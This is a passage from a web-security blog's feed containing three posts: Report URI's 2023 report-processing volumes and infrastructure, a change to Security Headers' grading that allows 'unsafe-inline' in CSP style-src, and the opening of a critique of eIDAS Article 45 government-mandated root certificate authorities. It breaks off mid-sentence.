rel="noreferrer">25,000,000 reports per week</a><br>Mar 2017 - <a href="https://scotthelme.co.uk/report-uri-io-needs-your-support/?ref=scotthelme.co.uk" rel="noreferrer">80,000,000 reports per week</a><br>Jun 2017 - <a href="https://scotthelme.co.uk/report-uri-io-needs-your-support/?ref=scotthelme.co.uk" rel="noreferrer">677,000,000 reports per week</a><br>Jul 2018 - <a href="https://scotthelme.co.uk/report-uri-a-week-in-numbers/?ref=scotthelme.co.uk" rel="noreferrer">2,602,377,621 reports per week<br></a>Jun 2019 - <a href="https://scotthelme.co.uk/maintaining-state-in-a-cloudflare-worker-with-the-http-cache/?ref=scotthelme.co.uk" rel="noreferrer">4,064,516,129 report per week</a><br>Mar 2021 - <a href="https://scotthelme.co.uk/report-uri-data-protection-update-2021/?ref=scotthelme.co.uk" rel="noreferrer">we hit half a trillion reports processed</a></p><p></p><p>That last one was a particularly big milestone and I feel like something that was really worth celebrating. Just think, half-a-trillion reports processed!</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">It&apos;s absolutely wild that I can now say we&apos;ve processed over HALF A TRILLION REPORTS for our customers! <br><br>The current total as of this tweet stands at:<br><br>500,205,618,910 reports!!! &#x1F632; <a href="https://t.co/jWQNQYX2dP?ref=scotthelme.co.uk">https://t.co/jWQNQYX2dP</a></p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1371099468108595200?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">March 14, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<!--kg-card-end: html-->
<p></p><p>We pushed on to hit our one trillionth report a little bit more quickly too! Michal even caught the point when it rolled over.</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">1 trillion OMG we&apos;ve just processed 1 TRILLION reports &#x1F632;&#x1F60D;&#x1F37B; That&apos;s a loooooooooooot of JSON &amp; XML! Good job everyone &#x1F57A; <a href="https://twitter.com/reporturi?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@reporturi</a> <a href="https://twitter.com/Scott_Helme?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@Scott_Helme</a> <a href="https://twitter.com/troyhunt?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@troyhunt</a> <a href="https://t.co/fYohs4LmKD?ref=scotthelme.co.uk">pic.twitter.com/fYohs4LmKD</a></p>&#x2014; Michal &#x160;pa&#x10D;ek (@spazef0rze) <a href="https://twitter.com/spazef0rze/status/1490072406316261376?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 5, 2022</a></blockquote>
<!--kg-card-end: html-->
<p></p><p>Now, as I sit here, we&apos;ve pushed 1.5 trillion reports... But, enough about where we were, let&apos;s talk about where we are and what we&apos;re doing today, starting with what volumes we&apos;re processing now.</p><p></p><h4 id="from-the-top">From the top!</h4><p>Our first point of contact for any inbound report will be Cloudflare, so I&apos;m going to grab the data for the last 7 days from our dashboard to take a look at. Here&apos;s just the raw number of requests that we&apos;ve seen hit our edge.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="889" height="445" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image.png 600w, https://scotthelme.co.uk/content/images/2023/11/image.png 889w" sizes="(min-width: 720px) 720px"></figure><p></p><p>In the last 7 days we saw over <strong><em>3,870,000,000</em></strong> requests coming in! You can see many of our common patterns trends in terms of the peaks and troughs throughout the day, and also that weekends are generally less busy than weekdays for us too. I love looking at our data egress graph because the only thing our reporting endpoint sends back is empty responses. They&apos;re usually either a 201 when we accept a report, or a 429 if you have exceeded your quota, but always empty, and there&apos;s a lot of them.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-1.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="892" height="457" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-1.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-1.png 892w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We&apos;ve served a staggering <strong><em>3.67TB</em></strong> of empty responses over the last 7 days! I also like to watch trends in how data reaches us and we can also gather some really interesting information at this scale. Take any of the following metrics for example, where we can look at how our service is being used, seeing that most people are, as expected, generating report volume in report-only mode or via our CSP Wizard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-2.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="442" height="199"></figure><p></p><p></p><p>We can also see some interesting data about clients sending reports too.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-3.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="433" height="196"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-4.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="445" height="202"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-5.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="439" height="193"></figure><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-6.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="445" height="178"></figure><p></p><p>Of course, we see clients sending us many requests, but we&apos;ve still received reports from over <strong><em>80,000,000</em></strong> unique clients!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-7.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="700" height="145" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-7.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-7.png 700w"></figure><p></p><p>That&apos;s a lot of browsers... </p><p></p><h4 id="through-the-cloudflare-worker">Through the Cloudflare Worker</h4><p>All reports that hit our edge go through our Cloudflare Worker for processing. It does some basic sanitisation of the JSON payloads, normalisation, and maintains state about our users to know if they are exceeding their quota so reports can be dumped as early as possible. This of course means that the number of requests hitting our Worker is going to be the same as the number of requests we&apos;re receiving at the edge.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-8.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1252" height="544" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-8.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-8.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-8.png 1252w" sizes="(min-width: 720px) 720px"></figure><p></p><p>What&apos;s interesting to see is that at peak times we&apos;re receiving around <strong><em>9,000 requests per second</em></strong> and that&apos;s a typical week for us. If a new customer joins suddenly, or an existing users deploys a misconfiguration suddenly, we&apos;ve seen spikes up and over 16,000 requests per second coming in. As I mentioned in the opening paragraph though, our Worker batches up reports from multiple requests and sends them to our origin after a short period, which you can see in our Subrequests metric. Despite receiving 3,900,000,000 requests in the last 7 days, the Worker has only sent 388,310,000 requests to our origin, meaning we&apos;re batching up ~10,000 reports per request to our origin on average. This is a metric we track to fine tune our aggregation and load, but looking at it live right now, we can see that the numbers line up.</p><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="952" height="360" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview.png 952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Size of the payload coming from the Worker</span></figcaption></figure><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="952" height="360" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--1-.png 952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Number of distinct reports in the payload</span></figcaption></figure><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="960" height="376" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png 600w, https://scotthelme.co.uk/content/images/2023/11/app.netdata.cloud_spaces_netdata-space-ue6n523_rooms_ingestion_overview--3-.png 960w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Total number of reports in the payload</span></figcaption></figure><p></p><p>This translates to over 100 mb/s of JSON coming in to our origin per second, and bear in mind, this is <em>massively</em> normalised and deduplicated. Our ingestion servers take these reports and then process them into our Redis cache, so our outbound from these servers is pretty similar to the inbound, as not many reports are filtered/rejected at this stage.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-9.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="481" height="178"></figure><p></p><p></p><h4 id="into-the-redis-cache">Into the Redis cache</h4><p>Our Redis cache for reports is a bit of a beast, as you may have guessed, and it&apos;s where reports sit for a short period of time. The cache acts as a buffer to absorb spikes and also allows for a little bit of deduplication of identical reports that arrive in a short time period, further helping us optimise. Looking at the RAM consumption, you can see reports flowing into the cache and also see when the consumer servers pull a batch of reports out for processing.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-10.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="952" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-10.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-10.png 952w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p>At present, we&apos;re not at our peak, but the Redis cache is handling almost 4,500 transactions per second, which isn&apos;t bad!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-11.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="955" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-11.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-11.png 955w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="consumption-time">Consumption time!</h4><p>The final stop in our infrastructure is through the consumer servers, which pull out batches of reports from the Redis cache to process into persistent storage in Azure Table Storage. We run a slightly smaller number of consumer servers with a lot more resources and these are the servers that are always being worked hard. Looking at their current CPU usage, they&apos;re sat at ~50% CPU as we start to approach the busiest time of the day, but they will still climb from here.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-12.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="958" height="379" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-12.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-12.png 958w" sizes="(min-width: 720px) 720px"></figure><p></p><p>The consumers will only see small spikes in inbound traffic when they pull a batch of reports from Redis, but they will always have a fairly consistent outbound bandwidth to Azure as they&apos;re pushing that data out to persistent storage.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-13.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="481" height="175"></figure><p></p><p></p><p>From here, it&apos;s on to the final stop for report data and after this point, it will visible in your dashboard to query, and any alerts/notifications will have been sent. </p><p></p><h4 id="azure-table-storage">Azure Table Storage</h4><p>I&apos;ve used Azure Table Storage since the beginning of Report URI and it&apos;s something that I&apos;ve never been given a good reason to move away from. It&apos;s a simple key:value store and is massively scalable, meaning I&apos;ve never had to learn how to be a DBA and it&apos;s always taken care of for me. You can read some of my <a href="https://scotthelme.co.uk/tag/table-storage/?ref=scotthelme.co.uk" rel="noreferrer">blog posts</a> about Table Storage, but let&apos;s see how much we&apos;re using it. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-14.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1588" height="520" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-14.png 1588w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This is our rate of transactions against Table Storage for the last week and as I happen to be writing this blog post on the 1st Nov 2023, all of our users have just had their monthly quota renewed. This happens at 00:00 UTC on the 1st day of each calendar month and it&apos;s why there is an enormous spike at the start of this graph and things were a lot more quiet before that. Of course, as we progress through a month, more of our users will exceed their monthly quota and reports will stop making it to persistent storage, mostly being dropped by the Cloudflare Worker and some by the consumer servers. It doesn&apos;t stop the reports being sent, it just means that we don&apos;t process them into persistent storage. Our current rate of transactions will slowly decline from where it is now down the the lowest levels by the end of the month again. As you would expect, our ingress and egress patterns follow the same trend.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-15.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1585" height="541" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-15.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p>Something that was introduced quite some time ago was our 90-day retention period on report data. We will keep aggregate, count and analysis data for as long as you want, but the raw JSON of each inbound report will be purged after 90 days. We had to, simply because we couldn&apos;t store that much information for an unlimited period of time. Despite that, we still have an impressive <strong><em>4.9 TiB</em></strong> of data on disk consumed by <strong><em>2,250,000,000 entities</em></strong> (reports)!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-16.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="1585" height="538" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-16.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-16.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-16.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p>That&apos;s quite a lot of JSON! &#x1F605;</p><p></p><h4 id="where-do-we-go-from-here">Where do we go from here?</h4><p>Whilst all of the above are amazing numbers, you may have noticed that our current report volumes are lower than those we have previously peaked at which were detailed at the start of this post. This is a trend I&apos;ve been following for a while now and I&apos;ve been able to put it down to a few things. The biggest impact is that we&apos;ve made really significant progress in helping our customers get up and running more quickly. Sites always send more reports and telemetry when they&apos;re first starting out using these technologies and the faster we can help them get their configurations matured, the faster they can reduce the volume of reports they&apos;re sending. Despite this, we&apos;re always adding new sites, so even though our users are using less reports on average, as we continue to grow, this has prevented our total volume from decreasing too much by constantly bringing new users on board.</p><p>Over the next year or so, we&apos;re also helping a lot of sites get ready for the new <a href="https://scotthelme.co.uk/pci-dss-4-0-its-time-to-get-serious-on-magecart/?ref=scotthelme.co.uk" rel="noreferrer">PCI DSS 4.0 requirements</a> and we&apos;re hoping to bring larger providers on board to provide our solution through them.  The PCI SSC are putting a huge pressure on sites with an e-commerce component to protect against Digital Skimming Attacks (a.k.a. <a href="https://report-uri.com/solutions/magecart_protection?ref=scotthelme.co.uk" rel="noreferrer">Magecart</a>) by locking down the JavaScript on their payment pages, something that CSP was literally designed for! As the natural choice for a reporting platform, we&apos;re well suited to help sites get their CSP defined, tested and deployed with the least friction possible. </p><p>I&apos;m excited for what the rest of 2023 will bring, but I&apos;m looking forward to 2024 already. Having built this company up from the first line of code almost 9 years ago, to where we are today, I wonder if it might be time to take the next big step soon! &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[A Balanced Approach: New Security Headers Grading Criteria]]></title><description><![CDATA[<p>The Security Headers grading criteria is something that doesn&apos;t change often, but when it does, there&apos;s a good reason behind the change. In this blog, I will outline the new grading criteria and the reasons why we&apos;ve made the change.</p><p></p><p><strong>Information</strong>: This is a</p>]]></description><link>https://scotthelme.co.uk/a-balanced-approach-new-security-headers-grading-criteria/</link><guid isPermaLink="false">6523f5a4a095a10001c4252e</guid><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 08 Nov 2023 12:06:19 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/banner-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/banner-1.png" alt="A Balanced Approach: New Security Headers Grading Criteria"><p>The Security Headers grading criteria is something that doesn&apos;t change often, but when it does, there&apos;s a good reason behind the change. In this blog, I will outline the new grading criteria and the reasons why we&apos;ve made the change.</p><p></p><p><strong>Information</strong>: This is a cross-post from the <a href="https://probely.com/blog/a-balanced-approach-new-security-headers-grading-criteria?ref=scotthelme.co.uk" rel="noreferrer">Probely blog</a>, you can read the original article there.</p><p></p><h4 id="security-headers">Security Headers</h4><p>For those that aren&apos;t familiar, <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">Security Headers</a> is a free security scanning tool that takes only a couple of seconds to conduct a scan. Your site can be awarded anything from an A+ grade, down to an F grade, all depending on the configuration of your HTTP Response Headers.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/Logo-02.jpg" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="2000" height="1125" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/Logo-02.jpg 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/10/Logo-02.jpg 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/10/Logo-02.jpg 1600w, https://scotthelme.co.uk/content/images/size/w2400/2023/10/Logo-02.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><p>If you want to conduct a scan, head over there now to check your grade and you will be tested against the new criteria outlined below.</p><p></p><h4 id="existing-criteria">Existing Criteria</h4><p>The grading criteria is quite clear as all of the headers that we score are listed in the summary section, making it easy to see which headers you&apos;re getting right, and which headers you&apos;re missing. Take for example the scan of my personal blog <a href="https://securityheaders.com/?q=scotthelme.co.uk&amp;followRedirects=on&amp;ref=scotthelme.co.uk" rel="noreferrer">here</a>:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="883" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image.png 600w, https://scotthelme.co.uk/content/images/2023/10/image.png 883w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see that I have all of the headers present, which is why they&apos;re highlighted in green, but I&apos;m still not achieving the highest possible grade of an A+ because I have a warning.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-1.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="886" height="172" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-1.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-1.png 886w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This warning is the most frequently raised question about our grading, and in truth, it&apos;s basically the only thing that&apos;s ever raised with our grading.</p><p></p><h4 id="using-unsafe-inline-in-csp-style-src">Using &apos;unsafe-inline&apos; in CSP style-src</h4><p>The warning here is given because I have the <code>&apos;unsafe-inline&apos;</code> value in my CSP <code>style-src</code> directive, allowing me to use inline styles on the page. Sites will sometimes do this because it&apos;s convenient, because they use a theme that requires it, because one of the libraries they use requires it, or a whole bunch of other reasons. An inline style might look like one of the following:</p><pre><code class="language-html">&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;
      p {
        color: green;
      }
    &lt;/style&gt;
  &lt;/head&gt;
&lt;/html&gt;</code></pre><p></p><pre><code class="language-html">&lt;p style=&quot;color: green;&quot;&gt;This paragraph is green.&lt;/p&gt;</code></pre><p></p><p>The problem with allowing unsafe inline styles is that an attacker can inject styles into the page and the browser wouldn&apos;t know if they were put there by the host of the website or by an attacker, meaning they&apos;d be used on the page. </p><p>As a good example of where <code>&apos;unsafe-inline&apos;</code> might be required, just take a look at the <a href="https://angular.io/guide/security?ref=scotthelme.co.uk#content-security-policy" rel="noreferrer">CSP docs</a> for Angular:</p><blockquote>The minimal policy required for brand new Angular is:<br><code>default-src &apos;self&apos;; style-src &apos;self&apos; &apos;unsafe-inline&apos;;</code></blockquote><p></p><h4 id="can-you-get-pwned-with-css">Can you get pwned with CSS?</h4><p>It&apos;s an interesting question, and one I&apos;ve been considering for a long time now. I even put the question out to the wider community back in Feb 2022 with a Twitter poll and a blog post by the same title: <a href="https://scotthelme.co.uk/can-you-get-pwned-with-css/?ref=scotthelme.co.uk" rel="noreferrer">Can you get pwned with CSS?</a></p><p></p>
<!--kg-card-begin: html-->
<center><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">I&apos;m considering changing the grading criteria on <a href="https://twitter.com/securityheaders?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@securityheaders</a> to allow an A+ grade with a CSP that contains unsafe-inline in the style-src directive. What are your thoughts?</p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1496480723187998723?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 23, 2022</a></blockquote></center> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<!--kg-card-end: html-->
<p></p><p>Allowing <code>&apos;unsafe-inline&apos;</code> in the <code>script-src</code> directive of CSP is obviously dangerous and can lead to an almost infinite number of bad things happening, but as it turns out, the damage that can be done with styles is quite limited. Not only that, but I&apos;ve yet to find any credible evidence of an attack happening where malicious styles were the attack vector. Even with widespread feedback from the community, the hypothetical issues are few and far between.</p><p></p><h4 id="what-are-we-trying-to-achieve">What are we trying to achieve?</h4><p>For me, any question on our grading criteria comes back to this point. Which of the following are we aiming for?</p><p></p><ol><li>The absolute best configuration possible, regardless of anything. </li><li>A sensible balance that it would be beneficial for everyone to achieve.</li></ol><p></p><p>As time has gone by, I&apos;ve seen security absolutists push us towards #1 on more occasions than I can count, but also as time goes by, I&apos;ve realised that achieving #2 would take us to a far better place overall. This is what we&apos;re focusing on with this change.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-3.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="835" height="148" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-3.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-3.png 835w" sizes="(min-width: 720px) 720px"></figure><p></p><h4 id="allowing-unsafe-inline-in-csp-style-src">Allowing &apos;unsafe-inline&apos; in CSP style-src</h4><p>As of the publication of this blog post, Security Headers will be relaxing the grade cap penalty for using <code>&apos;unsafe-inline&apos;</code> in CSP <code>style-src</code> which will, all else being good, allow you to achieve an A+ grade! The warning will still be present, because long term we should still try to move away from it, or at least not introduce it, but the grade cap will no longer ding your score.</p><p>To be clear, a site will still have had to put serious thought and effort into the configuration of their Security Headers, but now, I think the A+ grade means you&apos;ve achieved something that I&apos;d be happy if all sites were to achieve. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/image-2.png" class="kg-image" alt="A Balanced Approach: New Security Headers Grading Criteria" loading="lazy" width="889" height="337" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/10/image-2.png 600w, https://scotthelme.co.uk/content/images/2023/10/image-2.png 889w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Scan your site for <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">free</a> and tag us in your results! You&apos;ll get a cool badge when sharing a link to your scan results on social media! &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[What the QWAC?!]]></title><description><![CDATA[<p>Almost 2 years on from the last time I wrote about QWACs, I&apos;m sadly not here to tell you that things have gone well since then. In fact, I&apos;m actually here to tell you that things are not going well at all...</p><p></p><h4 id="qwac">QWAC</h4><p>Back in Jan</p>]]></description><link>https://scotthelme.co.uk/what-the-qwac/</link><guid isPermaLink="false">654a004e5065ae0001b5e1d7</guid><category><![CDATA[QWAC]]></category><category><![CDATA[eIDAS]]></category><category><![CDATA[TLS]]></category><category><![CDATA[PKI]]></category><category><![CDATA[EV]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 07 Nov 2023 14:56:27 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/ec.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/ec.png" alt="What the QWAC?!"><p>Almost 2 years on from the last time I wrote about QWACs, I&apos;m sadly not here to tell you that things have gone well since then. In fact, I&apos;m actually here to tell you that things are not going well at all...</p><p></p><h4 id="qwac">QWAC</h4><p>Back in Jan 2022, I wrote a blog post that went into details on what a QWAC, or Qualified Website Authentication Certificate, actually is: <a href="https://scotthelme.co.uk/looks-like-a-duck-swims-like-a-duck-qwacs-like-a-duck-probably-an-ev-certifiacate/?ref=scotthelme.co.uk" rel="noreferrer">If it looks like a duck, swims like a duck, and QWACs like a duck, then it&apos;s probably an EV Certificate</a></p><p>TLDR; It&apos;s an EV Certificate all over again &#x1F937;&#x200D;&#x2642;&#xFE0F;</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/facepalm-crowd.gif" class="kg-image" alt="What the QWAC?!" loading="lazy" width="498" height="274"></figure><p></p><p>In all seriousness though, that&apos;s actually quite a long and detailed post about the shortcomings of a QWAC and why they&apos;re just a terrible, terrible idea. They&apos;re only being pushed by organisations that would make $$$ selling them (funny that) and it&apos;s like the entire mess of EV has been conveniently forgotten. I&apos;m not here to re-tread the same ground, though, I&apos;m here to talk about something even more concerning. You might think &quot;ok, so we have a new type of pointless certificate available&quot;, and if that were the case, I wouldn&apos;t be writing about it again and we could all just not buy them. The problem is that there&apos;s something bigger lurking that really concerns me.</p><p></p><h4 id="my-concerns">My Concerns</h4><p>This isn&apos;t all just talk for me, having dedicated a huge portion of my life to working in this industry and being so passionate about it, this worries me. It worries me enough that I&apos;ve signed multiple open letters speaking out against this, with the most recent <a href="https://last-chance-for-eidas.org/?ref=scotthelme.co.uk" rel="noreferrer">just a few days ago</a>, and I&apos;ve even travelled to Brussels to sit alongside Member of European Parliament Karen Melchior, and other industry representatives, to <a href="https://securityriskahead.eu/wp-content/uploads/2022/11/Press-release-event-on-cybersecurity-risks-within-the-eIDAS-revision.pdf?ref=scotthelme.co.uk" rel="noreferrer">speak against this</a>. I have absolutely no skin in this game, one way or another, but I&apos;ve seen something that I believe is just fundamentally wrong, and I feel compelled to speak out against it.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-17.png" class="kg-image" alt="What the QWAC?!" loading="lazy" width="643" height="382" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-17.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-17.png 643w"></figure><p></p><h4 id="eidas-article-45latest-recitals">eIDAS Article 45 - latest recitals</h4><p>As we come towards the end of the legal process, we&apos;re closing in on the final revisions and final draft of some new regulation coming to the EU called <a href="https://digital-strategy.ec.europa.eu/en/policies/eidas-regulation?ref=scotthelme.co.uk" rel="noreferrer">eIDAS</a>. This new regulation contains many things, and it&apos;s only one small part of it that I fundamentally oppose, but it will have Global impact, far beyond the borders of any member state of the EU.</p><p>Alongside introducing the concept of a QWAC, discussed in my previous blog post, eIDAS is also going to introduce some very concerning requirements that affect the Internet PKI. At the top of my list of concerns is that browser and client vendors (Root Store Operators) will have a legal obligation to add Government mandated Root Certificate Authorities to their Root Stores, bypassing existing approval mechanisms. </p><p>Yep, you read that right. Government mandated Root Certificate Authorities...</p><p>I could end this blog post right here because anyone reading this will understand the significance of such a statement, and just how much of a catastrophically bad idea that is, but it gets worse. There will also be restrictions placed on Root Store Operators around handling incidents at those Root CAs and possibly removing trust in them for wrongdoing.  I cannot stress this enough so I&apos;m going to say it again, this is a terrible idea.</p><p></p><h4 id="how-it-works-now">How it works now</h4><p>The system that we have now is not perfect, by any stretch of the imagination, but it has been improved so much over the years with tireless work from the industry, that where we are now, finally, is a good place.</p><p>A browser or device vendor like Apple has a collection of Trusted Root Certificate Authorities that their devices will trust, and in turn, those devices will trust any certificates issued by those Trusted Root CAs. If you want to join this collection of Trusted Root CAs, you have to apply to join the <a href="https://www.apple.com/certificateauthority/ca_program.html?ref=scotthelme.co.uk" rel="noreferrer">Apple Root Certificate Program</a> and pass some very strict requirements. Of course, this makes sense, because being a Trusted Root CA is a massive responsibility that gives you an enormous amount of power, and Apple want to make sure that their customers aren&apos;t going to come to any harm because of your 